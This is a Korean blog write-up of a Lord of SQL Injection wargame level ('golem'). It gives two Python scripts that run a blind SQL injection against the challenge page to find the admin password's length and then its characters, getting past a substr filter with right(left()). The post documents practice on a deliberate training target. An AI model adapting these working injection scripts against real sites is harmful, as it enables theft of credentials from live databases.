[Lord Of SQL Injection] 11번

Notice

Recent Posts

Recent Comments

Link

Who am i?

« 2024/09 »
일	월	화	수	목	금	토
1	2	3	4	5	6	7
8	9	10	11	12	13	14
15	16	17	18	19	20	21
22	23	24	25	26	27	28
29	30

Tags more

Archives

Today

Total

관리 메뉴

Oh! JUN

[Lord Of SQL Injection] 11번 본문

문제풀이/Lord of SQL Injection

[Lord Of SQL Injection] 11번

Kwon Oh! JUN 2022. 2. 2. 00:44

패스워드 길이 알아내기

import requests
import string

url = "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php"
cookie = dict(PHPSESSID="쿠키값")

for i in range(1,100):
    param = "?pw='|| length(pw)like'"+str(i)+"'%23"
    len_result = url+param
    response = requests.get(len_result, cookies=cookie)

    if response.text.find("Hello admin")>0:
        print("password :"+str(i))
        break

패스워드 알아내기

import requests
import string

url = "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php"
cookie = dict(PHPSESSID="쿠키값")

asc = string.digits+string.ascii_letters
result=""

for i in range(1,9):
    for j in asc:
        param = "?pw=%27||ascii(right(left(pw,"+str(i)+"),1))like%27"+str(ord(j))+"%27%23"
        print(param)
        res_url = url+param
        response = requests.get(res_url, cookies=cookie)

        if response.text.find("Hello admin")>0:
            print("suscess")
            print(j)
            result+=j
            break
print("pw :"+result)

substr 필터링 되니까 right(left(pw,1),1)로 우회해서 알아냈다.

'문제풀이 > Lord of SQL Injection' 카테고리의 다른 글

[Lord Of SQL Injection] 14번 (0)	2022.02.03
[Lord Of SQL Injection] 13번 (0)	2022.02.03
[Lord Of SQL Injection] 12번(자세한 설명,수정완료) (0)	2022.02.02
[Lord Of SQL Injection] 7번 (0)	2022.01.30
[Lord Of SQL Injection] 4번 (0)	2022.01.30

'문제풀이/Lord of SQL Injection' Related Articles

Oh! JUN

[Lord Of SQL Injection] 11번 본문

[Lord Of SQL Injection] 11번

'문제풀이 > Lord of SQL Injection' 카테고리의 다른 글

티스토리툴바